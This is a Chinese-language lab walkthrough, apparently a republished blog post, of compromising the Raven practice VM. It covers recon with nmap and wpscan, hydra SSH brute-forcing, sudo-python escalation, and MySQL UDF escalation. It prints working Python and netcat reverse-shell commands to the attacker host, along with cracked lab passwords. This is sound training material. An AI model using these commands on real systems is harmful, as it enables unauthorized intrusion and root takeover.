您的位置:首页 > 文旅 > 旅游 > 邢台开发区网站_企业网络设计方案论文_网盘资源免费观看_山东疫情最新情况

邢台开发区网站_企业网络设计方案论文_网盘资源免费观看_山东疫情最新情况

2025/1/4 20:32:25 来源:https://blog.csdn.net/qq_61872115/article/details/144809512  浏览:    关键词:邢台开发区网站_企业网络设计方案论文_网盘资源免费观看_山东疫情最新情况
邢台开发区网站_企业网络设计方案论文_网盘资源免费观看_山东疫情最新情况

文章目录

一、基础信息

二、信息收集

三、暴力破解

四、提权

一、基础信息

Kali IP :192.168.20.146

靶机IP :192.168.20.153

二、信息收集

nmap -sS -sV -p- -A 192.168.20.153

开放了22,80,111,58305端口

访问一下80页面

目录扫描

dirsearch -u http://192.168.20.153 -X 403

发现有wordpress cms,访问一下页面,这里需要设置hosts文件解析

http://raven.local/wordpress/wp-login.php

使用wpscan扫描

wpscan --url http://raven.local/wordpress/ --enumerate u

扫描到两个用户名:michael,steven

三、暴力破解

继续尝试暴力破解密码

wpscan --url http://raven.local/wordpress/ --passwords /usr/share/wordlists/rockyou.txt --usernames michael,steven

爆破了很久但是没有爆出密码

另外靶机存在ssh服务,ssh用户也可能是这两个用户名,尝试爆破密码

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.20.153 ssh

这里爆破的时间很长,最终得到账户信息:

Michael/michael

Steven/pink84

四、提权

1、登录steven账户

Sudo -l 看到赋予了python最高权限,不需要root密码,那么可以利用python提权

sudo python -c 'import pty; pty.spawn("/bin/bash")'
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.20.146',8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

直接本地反弹shell或者反弹到kali上都可以,直接获取到root权限

2、登录michael账户

sudo -l

find / -perm -u=s -type f 2>/dev/null

发现无法使用sudo和suid位提权

查看计划任务也没有特别发现,路径:/var/spool/cron ; /etc/*cron*

在网站根目录下发现了wordpress目录,并且有配置文件

看到了数据库root账户密码

Ps -aux | grep mysql

查看当前数据库进程为root权限运行,可以考虑mysql udf提权

连接数据库

mysql -uroot -pR@v3nSecurity

select version(); ---查看版本

查看是否有写入权限:show global variables like 'secure%';

查看插件目录:show variables like '%plugin%';

查看系统版本,这可以确定等下我们要用的脚本:show variables like '%compile%';

kali 上寻找 exp:find / -name "*mysqludf*" 2>/dev/null

cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so /root

python -m http.server 8090

靶机上

cd /tmp

wget http://192.168.20.146:8090/lib_mysqludf_sys_64.so

提权操作

use mysql;
create table hack(line blob); #新建一个表,用来存放本地传来的 udf 文件的内容
insert into hack values(load_file('/tmp/lib_mysqludf_sys_64.so')); #在 hack 中写入 udf 文件内容
select * from hack into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so'; #将 udf 文件内容传入新建的 udf 文件中
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; #导入 udf 函数
select sys_exec('nc 192.168.20.146 9090 -e /bin/bash'); #执行

nc -lvvp 9090

python -c 'import pty;pty.spawn("/bin/bash")'

提权成功

此靶机在前面做过几乎一样的,但是在打的时候完全不记得了,并且采用的方式也和前面有一定的区别,也不算重复劳动。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

最新新闻

热搜词

如何通过代码修改网站数据:详细指南 小米路由器开启SSH,配置阿里云ddns,开启外网访问SSH和WEB管理界面 P10145 [WC2024] 线段树 题解 LeetCode 762[二进制表示中质数个计算置位] 02.01、移除重复节点 FWT(快速沃尔什变换)

声明:本站所有新闻及新闻图片来源于其他网站,如有侵权,请及时联系我们!

客户服务 | 关于我们 | 版权声明

版权所有:

Copyright 2024 尧图网 All Rights Reserved.QQ:809451989